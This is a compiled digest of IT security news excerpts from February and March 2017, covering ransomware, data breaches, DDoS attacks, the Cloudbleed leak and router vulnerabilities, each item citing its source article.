Full article [Option 1]:

http://english.kyodonews.jp/news/2017/03/462293.html

Computers of Japanese companies and individuals are becoming the prime target of an attack using "ransomware".

"Attacks on Japanese businesses have been particularly large in number," said Masakatsu Morii, professor of information and telecommunications engineering at Kobe University's Graduate School of Engineering. "The attackers may have come to know that Japanese would pay money," he said.

Computer security firm Trend Micro Inc. said it received reports of 2,810 cases in Japan of ransomware attacks in 2016, marking a 3.5-fold jump from the previous year.

The company's survey conducted last June shows that about 60 percent of the companies that were attacked paid ransoms. The payment in one case exceeded JP¥10 million (£70,600).

-----------------------
NEW DISK WIPING MALWARE TARGETING EUROPE AND SAUDI ARABIA
(International Business Times, dated 7th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/shamoon-2-0-stonedrill-new-disk-wiping-malware-targeting-europe-saudi-arabia-1610122

The dangerous disk wiping malware Shamoon, which was responsible for destroying nearly 35,000 computers at the Saudi Aramco in 2012 and other high-profile attacks across the Middle East after that, has a successor. A new wiper malware, dubbed StoneDrill, has been uncovered by security researchers, believed to be targeting more organisations across Saudi Arabia and Europe.

Researchers also uncovered that Shamoon 2.0's latest variant now also comes with fully functional ransomware capabilities and new 32-bit and 64-bit components. Researchers found that StoneDrill, in addition to targeting organisations in Saudi Arabia, also targeted the Kaspersky Security Network (KSN) in Europe, indicating that the cybercriminals behind the malware may be expanding their operations.

-----------------------
1.37 BILLION RECORDS LEAK AFTER SPAMMERS FORGOT TO PASSWORD PROTECT BACKUPS
(Computer World, dated 6th March 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3176901/security/1-37-billion-records-leak-after-spammers-forgot-to-password-protect-backups.html

Nearly 1.4 billion people are affected by a database records leak caused by spamming group River City Media (RCM) forgetting to password-protect their backups. Last week, MacKeeper security researcher Chris Vickery promised a "1.4 billion identity leak story" would be made public on Monday.

oday, Vickery described the leak from RCM as a "tangible threat to online privacy and security" because the database included nearly 1.4 billion email accounts tied to real names, IP addresses and "often" physical addresses. RCM accumulated that list via offers for things such as "free" gifts, credit checks, sweepstakes, education opportunities and techniques like co-registration in which a person's info is shared with unnamed affiliates after clicking "submit" or "I agree" on a website.


-----------------------
DDoS ATTACK TAKES DOWN LUXEMBOURG GOVERNMENT SERVERS
(International Business Times, dated 2nd March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/ddos-attack-takes-down-luxembourg-government-servers-1609380

The Luxembourg government's servers were hit by hackers in a massive DDoS attack that reportedly lasted over 24 hours. The attack, which began on Monday morning (27 February), is believed to have affected over a hundred websites hosted by the government's servers.

According to the Luxembourg Wort, the DDoS attack started at around 9.30am on Monday. An hour after the attack commenced, the Centre des Techniques de l'information de l'Etat (CTIE), which is the state-owned IT operator, posted on Twitter, confirming that it was the victim of a DdoS attack.

-----------------------
WHAT CAUSED THE CLIXSENSE PRIVACY BREACH THAT EXPOSED USER DATA
(Tech Target, dated March 2017 author Michael Cobb)

Full article [Option 1]:

http://searchsecurity.techtarget.com/answer/What-caused-the-ClixSense-privacy-breach-that-exposed-user-data

ClixSense is a paid to click service where members can make money online by completing surveys and viewing advertisements. A recent privacy breach led to details from more than 6.6 million ClixSense user accounts being offered up for sale, which also exposed the service's appalling information handling practices and lack of security controls to protect its users' personal data.

Information including passwords, email addresses, dates of birth, sex, first and last names, home addresses, IP addresses, account balances and payment histories were taken from a compromised database. The shocking thing is that the passwords were not hashed, but stored in plaintext, which is an inexcusable practice.

-----------------------

(2nd April 2017)


IT SECURITY REVIEW - FEBRUARY 2017

-----------------------
SMART TEDDY BEARS INVOLVED IN A CONTENTIOUS DATA BREACH
(Computer World, dated 28th February 2017 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3175466/security/smart-teddy-bears-involved-in-a-contentious-data-breach.html

If you own a stuffed animal from CloudPets, then you better change your password to the product. The toys -- which can receive and send voice messages from children and parents -- have been involved in a data breach involving more than 800,000 user accounts.

The breach, which grabbed headlines on Monday, is raising concerns from security researchers because it may have given hackers access to voice recordings from the toy's customers. But the company behind the products, Spiral Toys, is denying that any customers were hacked.

"Were voice recordings stolen? Absolutely not," said Mark Meyers, CEO of the company.

-----------------------
YAHOO DATA BREACHES
(International Business Times, dated 28th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/yahoo-data-breaches-heres-what-you-need-know-about-new-information-revealed-us-senate-1608917

Yahoo has provided some new information about the two massive data breaches it was hit with in 2013 and 2014. The information was detailed in a letter to the US Senate, which was meant to be a response to an angry letter, previously sent to CEO Marissa Mayer from Senators John Thune and Jerry Moran.

In the latest letter, sent by Yahoo VP and head of global public policy April Boyd, the firm claims that it was unaware of the 2013 data breach, until it was approached by law enforcement authorities about it in November 2016. However, the tech giant revealed that it was aware of the 2014 hack the same year that it occurred, raising questions about why the details of the breach were not disclosed until 2016.

-----------------------

NEW YORK AIRPORT LEAKS OVER 750Gb WORTH OF EMAILS, PASSWORDS AND GOVERNMENT FILES
(International Business Times, dated 24th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/new-york-airport-leaks-over-750gb-worth-emails-passwords-government-files-1608448

For months, the Stewart International Airport in New York was reportedly exposing sensitive internal data onto the internet without password protection. The data - over 750GB in total - has been described as a "complete compromise" of its network integrity.

Uncovered by a MacKeeper security researcher called Chris Vickery, the massive trove of sensitive data was wide-open to theft or compromise until as recent as this week (21 February) and had been publicly available since at least March last year.

The leaked data includes 107GB-worth of personal email correspondence from within the airport alongside letters from the Transportation Security Administration (TSA), a federal agency linked to the US Department of Homeland Security (DHS).

-----------------------
RANSOMWARE "CUSTOMER SUPPORT" CHAT REVEALS CRIMINALS RUTHLESSNESS
(Computer World, dated 23rd February 2017 author Gregg Keizer)

Full article [Option 1]:

www.computerworld.com/article/3173698/security/ransomware-customer-support-chat-reveals-criminals-ruthlessness.html

Ransomware criminals chatting up victims, offering to delay deadlines, showing how to obtain Bitcoin, dispensing the kind of customer support that consumers lust for from their cable and mobile plan providers, PC and software makers?

Finnish security vendor F-Secure yesterday released 34 pages of transcripts from the group chat used by the crafters of the Spora ransomware family. The back-and-forth not only put a spotlight on the gang's customer support chops, but, said a company security advisor, illustrated the intertwining of Bitcoin and extortion malware.

"We should be thankful that there are at least some practical barriers to purchase Bitcoins," wrote Sean Sullivan of F-Secure in a Wednesday post to the firm's blog. "If it were any easier to do so, very little else would check the growth of crypto-ransomware's business model."

-----------------------
GOOGLE CHROME "MISSING FONT" HACK IS THE LATEST MALWARE SCAM YOU NEED TO AVOID
(International Business Times, dated 22nd February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/google-chrome-missing-font-hack-latest-malware-scam-you-need-avoid-1607942

Cybercriminals are skilled at coming up with new and innovative ways to trick web users into falling into carefully placed traps to then infect them with malware. One bullish tactic, now reportedly targeting Google Chrome, spreads via a sneaky "missing font" prompt.

The "drive-by infection" hack was spotted on a compromised WordPress website by a security researcher called Mahmoud Al-Qudsi, who found it to be using JavaScript to change how text was displayed on the website and urging users to download a "fix".

How does the Chrome hack work?


The malicious script caused text on the website to be replaced with "symbols and rubbish" in place of the content, Al-Qudsi wrote in a blog post. Screenshots show the hacker designed a warning box that appears legitimate, using Chrome's branding and colour scheme.

-----------------------

HACKERS CAN STEAL MILLIONS OF CARS AFTER DISCOVERING HUGE FLAW IN MANUFACTURERS APP
(International Business Times, dated 17th February 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-can-steal-millions-cars-after-discovering-huge-flaw-manufacturers-connected-car-apps-1607200

Security researchers have discovered that it is easy for attackers to gain access to millions of cars, simply by hacking into car-controlling mobile apps and using them to unlock the vehicles.

Kaspersky Lab researchers Mikhail Kuzin and Victor Chebyshev decided to analyse nine different connected car Android apps - designed to let drivers easily locate cars and unlock them via smartphone - by top car manufacturers.

Each app has been downloaded between 10,000 to one million times from the Google Play app store. The researchers discovered that all nine mobile apps feature unencrypted usernames and passwords that are stored together with the car's unique Vehicle Identification Number (VIN) and in some cases, even the car's licence plate number in plaintext .xml files in the device, which is a dangerous mistake.

-----------------------
HACKER BREACHED 63 UNIVERSITIES AND GOVERNMENT AGENCIES
(Computer World, dated 15th February 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3170724/security/hacker-breached-63-universities-and-government-agencies.html

A "Russian-speaking and notorious financially-motivated" hacker known as Rasputin has been at it again, hacking into universities and government agencies this time, before attempting to sell the stolen data on the dark web.

According to the security company Recorded Future, which has been tracking the cybercriminal's breaches, Rasputin's most recent victims include 63 "prominent universities and federal, state, and local U.S. government agencies." The security firm has been following Rasputin's activity since late 2016 when the hacker reportedly breached the U.S. Electoral Assistance Commission and then sold EAC access credentials.

All of the hacked agencies and universities have been notified about the breaches by Recorded Future. There were 16 U.S. state government victims, 6 U.S. cities and four federal agencies. Additionally, there were two "other" .gov sites which included Fermi National Accelerator Laboratory, "America's premier particle physics lab," and the Child Welfare Information Gateway, which is "a service of the Children's Bureau, Administration for Children and Families, U.S. Department of Health and Human Services."

-----------------------
ALLEGED RUSSIAN HACKER WHO USED A BOTNET TO STEAL FROM THOUSANDS OF US BANKS ARRESTED IN LA
(International Business Times, dated 11th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/alleged-russian-hacker-who-used-botnet-steal-thousands-us-banks-arrested-la-1606002

US authorities have reportedly arrested an alleged Russian hacker, believed to have stolen money from thousands of US bank accounts. The "extremely sophisticated" alleged hacker is believed to have used a botnet of 10,000 strong hacked computers to launch cyberattacks. Alexander Tverdokhlebov was arrested on 1 February in Los Angeles, according to reports.

US Secret Service agents' investigation into a Russian cybercrime gang reportedly led them to the 29-year-old, who is currently being held in the Metropolitan Detention Center in Los Angeles on cybercrime and wire fraud charges. Prosecuting attorneys describe him as being well connected with ties to several elite Russian language cybercrime forums, according to reports.

Investigators stumbled onto Tverdokhlebov while looking into online chats of another Russian - Vadim Polyakov, a 32-year-old from St Petersburg who, in 2016, pleaded guilty to the million-dollar Stubhub concert-ticket scam.

-----------------------
ITALY'S FOREIGN MINISTRY CAME UNDER CYBER ATTACK IN 2016
(Reuters, dated 10th February 2017)

Full article [Option 1]: www.reuters.com/article/uk-italy-cyber-idUKKBN15P291

Italy's foreign ministry was hacked last year, a source close to the department said on Friday, confirming a report in the Guardian newspaper which also said Russia was suspected of perpetrating the attack.

Last spring, hackers got into data systems at the ministry, which was then headed by now-Prime Minister Paolo Gentiloni. The attacks carried on for more than four months but did not gain access to classified information, the paper said.

The source said security had since been stepped up.

"These were not attacks on the encrypted computer system which carries the most important and sensitive information, but the email system for staff at the foreign ministry and embassies," the source said.

According to Britain's Guardian newspaper, two people with knowledge of the attack said the Russian state was believed to have been behind it. The source close to the ministry could not confirm this.

-----------------------
INDIA'S PROPOSED MASS SURVEILLANCE PROGRAMME SEEN AS A BLOW TO INTERNET FREEDOM
(International Business Times, dated 10th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/indias-proposed-mass-surveillance-programme-seen-blow-internet-freedom-1605802

India's new mass surveillance project, dubbed Centralised Monitoring System (CMS), will reportedly be fully operational by the first quarter of 2017, according to a draft Universal Periodic Review (UPR) report, which is due to be reviewed by the UN in the coming months. Concerns have been raised by privacy experts over the programme potentially expanding the government's control over internet rights and freedoms.

The draft report, which has broad similarities with previous editions, also reportedly comes with completely new topics related to the state's role in controlling the internet. The new topics feature in two dedicated sub-sections titled "Fundamental Freedoms and Participation in Public and Political Life", part of the "Civil and Political Rights" framework.

uaware note :
would India's action be in preparation for the EU's new data protection laws which will affect how EU registered company's use data in non-EU countries.

-----------------------
TICKLEBLEED : SECURITY FLAW REMOVES HTTPS ENCRYPTION FROM ALMOST 1,000 WEBSITES
(International Business Times, dated 10th February 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/ticklebleed-critical-f5-security-flaw-removes-https-encryption-almost-1000-websites-1605946

A security researcher has discovered a critical security bug in multiple F5 firewalls and load balancers that causes HTTPS encrypted connections to leak sensitive data. The bug affects almost 1,000 popular websites and website owners are advised to check for the vulnerability urgently.

The security flaw, known as Ticklebleed, was discovered by Cloudflare cryptography engineer Filippo Valsorda. Some packets - a unit of data routed between an origin and destination on the internet - sent by a Cloudflare customer using the Railgun web optimisation tool caused an error that confused Cloudflare's Railgun TLS stack.

-----------------------
VERIZON CYBERCRIME SLEUTH REVEALS HOW IoT ALMOST TOOK AN ENTIRE UNIVERSITY OFFLINE
(International Business Times, dated 10th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/verizon-cybercrime-sleuth-reveals-how-iot-almost-took-entire-university-offline-1605941

The rapid spread of internet-of-things (IoT) devices, from smart-fridges to web-connected home camera systems, has left many of these products wide open to hackers who can exploit weak security and lax passwords to enslave them into so-called 'botnets'.

These computer bot armies, which in reality are simply a hefty series of infected devices injected with a strain of malware, can easily - and cheaply - be deployed by cybercriminals to direct waves of traffic at a websites' server in order to take it offline.

Dine (the Investigator) who is a US airforce veteran with over a decades-worth of cyber forensics experience, said Verizon was called to investigate after a suspicious amount of web searches within the network were directed to lookup external domains.

Analysis on the university's network later identified over 5,000 devices that were making hundreds of Domain Name Service (DNS) look-ups every 15 minutes. "This was coming from their IoT network, coming from their vending machines and light sensors," he said.

-----------------------
CYBER CRIMS JUST KEEP GETTING BETTER, SAYS EU INFOSEC AGENCY
(ITNEWS, dated 9th February 2017 author Juha Saarinen)

Full article [Option 1]:

https://www.itnews.com.au/news/cyber-crims-just-keep-getting-better-says-eu-infosec-agency-450423

Criminals upped the ante last year and beat down cyber defences with new, superior attack types, the European Union Agency for Network and Information Security (ENISA) says in its annual threat report, taking stock of 12 months worth of incidents.

Cyber defences matured and improved in 2016, but attackers remained one step ahead, ENISA said in the report, enjoying record turnovers for criminal activities.

ENISA said attackers abused unsecured internet of things (IoT) devices for massive denial-of-service traffic floods last year. It observed large, malicious IT and network infrastructures that withstand takedown and which allow for quick development and multi-tenancy.

-----------------------
MYSTERIOUS MALWARE WITH SUSPECTED LINKS TO RUSSIA INFECTING US-BASED EMBASSIES
(International Business Times, dated 8th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/mysterious-malware-suspected-links-russia-infecting-us-based-embassies-1605436

Security researchers have uncovered a hacking campaign that is actively targeting a slew of diplomatic, government and embassy websites in the US using a form of computer malware that has previously been linked to a Russian cybercrime group.

According to Forcepoint, a cybersecurity firm, the mysterious hackers are using a stealthy tactic long-associated with a group dubbed "Turla". Believed to be a reconnaissance mission, the researchers said it shows some signs of nation-state involvement.

"The majority of the targeted sites were ministry and embassy sites although sites with different profiles were also compromised," said security researcher Roland Dela Paz in a blog post. "Interestingly, all the targeted embassies [were] located in Washington DC."

The group's malware - also branded "Turla" - has attacked the foreign affairs ministries of Kyrgyzstan, Moldova and Uzbekistan, a political party in Austria, a socialist organisation in Spain and the US-based embassies of Iraq, Jordan, Zambia and Russia.

-----------------------
A RASH OF INVISIBLE-FILELESS MALWARE IS INFECTING BANKS AROUND THE GLOBE
(ARS-TECHNICA, dated 8th February 2017 author Dan Goodin)

Full article [Option 1]:

https://arstechnica.com/security/2017/02/a-rash-of-invisible-fileless-malware-is-infecting-banks-around-the-globe/

Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran's nuclear program.

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools-including PowerShell, Metasploit, and Mimikatz-to inject the malware into computer memory.

-----------------------
HONEYPOTS - A WEAPON THAT CAN PROTECT YOUR NETWORK BEFORE DEFENCES FAIL
(The Register, dated 8th February 2017 author Darren Pauli)

Full article [Option 1]: www.theregister.co.uk/2017/02/08/honeypots_feature_and_how_to_guide/

The hackers breached the transport operator's systems and before they knew it had sent a passenger train hurtling into a wall. And the only reason you didn't read about it in the papers was that the systems were an entirely fictitious network created in 2015 to test just how far snoopers or crims would go in attacking vulnerable transport systems.

"HoneyTrain was also a great experiment to analyze the adversary's moral limits," says Lukas Rist (@glaslos), chief research officer with the Honeynet Project, which helped build the fake train system known as the HoneyTrain. "They had attackers derailing a train or running the train at full speed into a dead end."

Over the course of two weeks, HoneyTrain, complete with working model trains and real security CCTV camera footage of train stations, suffered a staggering 2.7 million attacks.

Those attacks are a graphic demonstration of "honeypots", the practice of deliberate deception aimed at observing attackers.

The practice is widely used in information security circles, thanks largely to the Honeynet Project, a non-profit much-respected security initiative that maintains and advocates for honeynets through 23 global chapters. Honeypots and the much larger and more complex honeynets are popular research tools to lure attackers, revealing their tools and tactics, but also operate as a line of defence for corporate networks.

-----------------------
PHISHING : ANOTHER THING WE CAN BLAME ON BREXIT
(The Register, dated 7th February 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/02/07/phishing_trends/

Ransomware attacks are increasingly focusing on organisations that are more likely to pay up, such as healthcare, government, critical infrastructure, education, and small businesses.

Phishing volume grew by an average of more than 33 per cent across the five most-targeted industries, according to a study by PhishLabs out Tuesday. File-encrypting ransomware has become the predominant type of malware distributed via phishing, essentially because the type of crime is both straightforward and profitable.

Phishing volume peaked mid-year due to the influence of major global events, such as Brexit, and a spike in virtual web server compromises.

-----------------------
AUSTRIAN PARLIAMENT SAYS TURKISH HACKERS CLAIM CYBER ATTACK
(Reuters, dated 7th February 2017 author Reuter Reporters)

Full article [Option 1]:

www.reuters.com/article/us-austria-hackers-parliament-idUSKBN15M0NX

Austria's parliament said on Tuesday that a Turkish hackers' group had claimed responsibility for a cyber attack that brought down its website for 20 minutes this weekend.

Aslan Neferler Tim (ANT), or Lion Soldiers Team, whose website says it defends the homeland, Islam, the nation and flag, without any party political links, claimed the attack, a parliamentary spokeswoman said.

Relations between Turkey and Austria soured last year after President Tayyip Erdogan cracked down on dissent following a failed coup, and Vienna has since made a solo charge within the European Union for accession talks to be dropped.

Reporting by Shadia Nasralla, Francois Murphy in VIENNA and Daren Butler in ISTANBUL; Editing by Louise Ireland

 -----------------------

POLISH BANKS HIT BY MALWARE SENT THROUGH HACKED FINANCIAL REGULATOR
(The Register, dated 6th February 2017 author Keiren McCarthy)
Full article [Option 1]:

www.theregister.co.uk/2017/02/06/polish_banks_hit_by_malware_sent_through_hacked_financial_regulator/

Polish banks are investigating a massive systems hack after malware was discovered on several companies' workstations.

The source of the executables? The sector's own financial regulator, the Polish Financial Supervision Authority (KNF).

A spokesman for the KNF confirmed that their internal systems had been compromised by someone "from another country". But when it was discovered that the regulator's servers were hosting malicious files that were then infecting banks' systems, the decision was made to take down the KNF's entire system "in order to secure evidence."

According to one cyber security site that spoke to a number of banks and carried out a preliminary analysis, a number of banks confirmed that they had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared between the group of roughly 20 commercial banks in the country and other banks started reporting the same issues.

-----------------------
HACKERS TARGET INTERCONTINENTAL PAYMENT CARD DATA OF 12 US HOTELS IN MASSIVE DATA BREACH
(International Business Times, dated 4th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-target-intercontinental-payment-card-data-12-us-hotels-massive-data-breach-1604802

The InterContinental Hotels Group (IHG) has confirmed that 12 of its US-based hotels were hit with a data breach that saw hackers target payment card data. The confirmation comes a little over a month after the Holiday Inn parent company claimed that it was investigating claims of a potential breach, according to a report.

The hospitality giant said that payment cards used between August and December 2016, at restaurants and bars of the 12 hotels, were affected by the breach. The hackers infected the hotels' servers, which processed payment card data, with malware.

The malware searched for track data read from the magnetic strip of payment cards, including data such as cardholders' name, card number, expiration date, and internal verification code. The hotel chain claimed that the malware did not affect payment cards used at the front desk.

-----------------------
NETHERLANDS REVERTS TO HAND-COUNTED VOTES TO QUELL SECURITY FEARS
(The Register, dated 2nd February 2017 author Richard Chirgwin)

Full article [Option 1]:

www.theregister.co.uk/2017/02/02/netherlands_reverting_to_handcounted_votes_to_quell_security_fears/

The Netherlands has decided its vote-counting software isn't ready for prime time, and will revert to hand-counted votes for its March 15 election.

The voteare's security came under question when Dutch security bod Sijmen Ruwhof told local newscaster RTL Nieuws that the average iPad is more secure than the electoral software, called OSV.

He warned that Windows XP is still used for some installations of the system, and in his own blog notes that known-to-be-dud SHA-1 was also employed. He also claimed that unsecured USB sticks would be used to move electoral data.

In a letter sent to the House of Representatives, Minister of the Interior Dr. Roland Plasterk says votes won't even be entrusted to USB keys: they will be counted at polling stations, with paper reports passed up to the municipality level, then on to aggregating locations, and finally to the country's Electoral Council.

"I've stated that the Cabinet cannot rule out state actors benefiting from influencing the political decision-making process and public opinion in the Netherlands, and deploying means to attempt to achieve this influence", Plasterk's letter says.

-----------------------
TICKING "TIME-BOMB" FAULT WILL RENDER CISCO GEAR USELESS AFTER 18 MONTHS
(The Register, dated 3rd February 2017 author Thomas Claburn)

Full article [Option 1]: www.theregister.co.uk/2017/02/03/cisco_clock_component_may_fail/

Cisco has issued a warning that an electronic component used in versions of its routing, optical networking, security and switch products prior to November 16, 2016 is unreliable - and may fail in the next year and a half, rendering affected hardware permanently inoperable.

"Although the Cisco products with this component are currently performing normally, we expect product failures to increase over the years, beginning after the unit has been in operation for approximately 18 months," Cisco said in its advisory.

"Once the component has failed, the system will stop functioning, will not boot, and is not recoverable."

And without naming names, Cisco said that the clock-signal-generating component is also used by other companies. Expect further notices of this sort from other vendors shortly.

Cisco said it learned about the issue in late November and has worked with the component supplier to fix the faulty part. As a result, currently shipping products are not affected.

----------------------
GOOGLE MISTAKES THE ENTIRE NHS FOR MASSIVE CYBER-ATTACKING BOTNET
(The Register, dated 1st February 2017 author Kat Hall)

Full article [Option 1]: www.theregister.co.uk/2017/02/01/google_mistakes_entire_nhs_for_a_botnet/

Google is blocking access to the entire NHS network, mistaking the amount of traffic it is currently receiving as a cyber attack.

An email from an NHS trust's IT department seen by The Register confirmed that the US search giant has mistaken the current traffic levels for a botnet.

The email headed "Google Access" stated: "Google is intermittently blocking access due to the amount of traffic from NHS Trusts Nationally (This is not being blocked by the IT Department).

"This is causing Google to think it is suffering from a cyber-attack.

"We are advising staff to use an alternative search engine i.e. Bing to bypass this problem.

"If you have 'Chrome' on your desktop the page will display correctly but if you 'should' get a CAPTCHA pop up, please follow the instructions to continue."

The source said they did not know why Google had suddenly decided to block access to the NHS net, but confirmed it was the "go-to resource" for a lot of clinicians.

----------------------
CISCO ROUTERS FOR ISP's LETS HACKERS HIJACK PEOPLE's ROUTERS
(The Register, dated 1st February 2017 author Shaun Nichols)

Full article [Option 1]: www.theregister.co.uk/2017/02/01/cisco_remote_access_hole_in_prime_home/

Cisco is advising ISPs and other service providers using its Prime Home system to install a security update immediately - to squash a serious remote execution bug.

Switchzilla says the flaw, which was given a 10.0 CVSS score, could allow an attacker to log into the software as an administrator and remotely take control of thousands upon thousands of customers' home routers, broadband gateways and similar boxes.

"An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication," Cisco said today. "An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges."

Note that "administrator" was italicized by the networking giant. Super serious.

Cisco pitches Prime Home as a "solution" for ISPs and connected device vendors, allowing companies to control devices such as ISP-issued cable modems, routers, and set top boxes in subscribers' homes from afar. It uses "Broadband Forum's TR-069 suite of protocols to provision and manage in-home devices."
----------------------

(1st March 2017)


RANSOMWARE SOARS IN 2016, WHILE MALWARE DECLINES
(Computer World, dated 7th February 2017 author Matt Hamblen)

Full article [Option 1]:

www.computerworld.com/article/3166346/security/ransomware-soars-in-2016-while-malware-declines.html

A global cyberthreat report released Tuesday found that 2016 was a mixed bag: malware was down slightly, but ransomware attacks soared, up 167 times the number recorded in 2015.

In addition to that huge increase in ransomware, 2016 saw a new line of cybercrime from a large-scale DDoS attack through internet of things devices. The principal case occurred in October when the Mirai botnet attacked unprotected IoT devices, such as internet-ready cameras, resulting in a DDoS attack on Dyn servers.

The 2016 report, by cybersecurity company SonicWall, looked at data from daily network feeds sent from more than 1 million sensors in nearly 200 countries.

During all of 2016, SonicWall found that unique samples of malware fell to 60 million samples, down from 64 million in 2015, a 6.25 percent decrease. Total malware attempts also fell to 7.87 billion from 8.19 billion, a 4 percent decrease.

However, ransomware-as-a-service (RaaS), where ransomware is provided by cybercriminals to other bad guys as a service, rose, offering quick payoffs to cybercrooks, SonicWall found. Ransomware is malicious software designed to block access to a computer system until a ransom is paid to the attacker.

Ransomware attacks rose from 3.8 million in 2015 to 638 million in 2016, an increase of 167 times year over year. SonicWall theorized that ransomware was easier to obtain in 2016 and that criminals faced a low risk of getting caught or punished.

Ransomware was the "payload of choice for malicious email campaigns and exploits," SonicWall said.

In 2016, the most popular malicious email campaigns were based on ransomware, typically Locky, which was deployed in more than 500 million total attacks throughout the year. No industry was spared: the mechanical and industrial engineering industry got 15% of the ransomware hits, while pharmaceuticals and financial services companies each got 13%, while real estate companies got 12%.

During the Mirai botnet surge in November, SonicWall found that the U.S. got 70 percent of the DDoS attacks, followed by Brazil with 14 percent and India with 10 percent.

SonicWall CEO Bill Conner said that for all of 2016, the cyberthreat landscape evolved and shifted. "Cybersecurity is not a battle of attrition. It's an arms race and both sides are proving exceptionally capable and innovative," he said in a statement.

For example, with chip cards used for in-store payments, malware attacks at physical stores declined by 93% from 2014 to 2016, SonicWall said. Chip cards went into wider use in the U.S. in October 2015. However, online card fraud in the U.S. surged more than 42% since late 2015, given the shift of attackers to online, according to some security experts.

(1st March 2017)


CLOUDFLARE LEAKS DATA AS MILLIONS OF WEBSITES EXPOSED TO BUG
(The Register, dated 24th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/cloudflare-leaks-dating-site-messages-uber-data-millions-websites-exposed-bug-1608401

Cloudflare, the web optimisation and security platform used by over five million websites, has confirmed a massive coding error resulted in the leaking of sensitive data of its customers for months - including passwords, internet cookies and private messages.

The bug impacted big-name brands including 1Password, Uber and dating site OKCupid, and has been blamed on a "memory leakage." Cloudflare said in a technical summary of the flaw that around 1 in every 3,300,000 HTTP requests sent through its system were at risk.

Alongside the noted brands, there is now a running list of potentially impacted domains being published to GitHub. So far, they include patreon.com, uber.com, tfl.gov.uk, medium.com and many more. The count is currently sitting at over four million (4,287,625), however these are not yet confirmed victims.

According to John Graham-Cumming, Cloudflare's chief technology officer (CTO), the number of impacted websites is closer to 3,400. However, a true figure remains unclear at this time. "We identified 3,438 unique domains," Graham-Cumming said.

The most vulnerable period for users was between 13 February and 18 February this year, however admitted the issues may have been around for up to five months, since September 2016.

The wide-ranging issue was uncovered by Google Project Zero researcher Tavis Ormandy, a well-known software bug hunter in security circles. In a detailed run-down of his discovery, he exposed the shocking scope of the coding snafu, reluctantly labelling it "CloudBleed".
What was leaked by the Cloudflare bug?

"I didn't realise how much of the internet was sitting behind [Cloudflare] until this incident. The examples we're finding are so bad," Ormandy wrote on 19 February.

"I'm finding private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings," he said. "We're talking full HTTPS requests, client IP addresses, full responses, cookies, passwords, keys, data, everything."

Graham-Cumming said his firm, which worked overtime to release a fix this week, has not discovered "any evidence of malicious exploits" as a result of the bug, however confirmed hit impacted Http cookies, authentication tokens and unspecified "other sensitive data."

"One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines," he said, in relation to a secretive crypto key that secured the connection between the firm's own internal network.

What's worse, a large amount of the leaked data was reportedly cached - or saved - by public search engines including Google, Bing and Yahoo. Ormandy said his organisations is trying to clean this up, but described any efforts to do so as "a bandaid."

"Cloudflare customers are going to need to decide if they need to rotate secrets and notify their users based on the facts we know," he noted. The researcher also said he did not know if the bug had been exploited but that it's likely other web crawlers were able to collect the data.

n his notes, Ormandy appeared overall pleased with Cloudflare's response to this disclosure, but said at one point the firm "pointed out" its bug bounty programme as one method of informing them of vital issues. The problem with this, he said, is that the top prize is a t-shirt.

He also described a number of delays on Cloudflare's side, however this is likely explained by the sheer scope of the problem the service was facing. When presented with a copy of the draft notification, he said it "severely downplays the risk to customers."

In his blog post, Graham-Cumming responded: "Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement."

The websites hit by the bug were not notified prior to Ormandy's disclosure which, as expected, has caused many to face instant complaints from concerned customers." Now, some internet-based organisations are being forced to address the issues head-on.

Jeffrey Goldberg, a security expert with 1Password, issued a statement on the incident. He wrote: "No 1Password data is put at any risk through the bug reported about CloudFlare. The security of your 1Password data remains safe and solid."

Meanwhile, on Twitter, encrypted email provider, ProtonMail, said: "We do NOT use Cloudflare, #Cloudbleed does not impact your ProtonMail credentials." Others suggested such bugs are likely to have been exploited, especially by well-funded hackers at the NSA.

---------------------

List of domains using Cloudflare DNS (potentially affected by Cloudbleed HTTPS traffic leak)

https://github.com/pirate/sites-using-cloudflare/

---------------------
HOW TO CHECK IF YOUR DATA IS SAFE AND WHAT TO DO TO KEEP YOUR ACCOUNTS SECURE
(International Business Times, dated 25th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/cloudflare-data-leak-how-check-if-your-data-safe-what-do-keep-your-accounts-secure-1608519

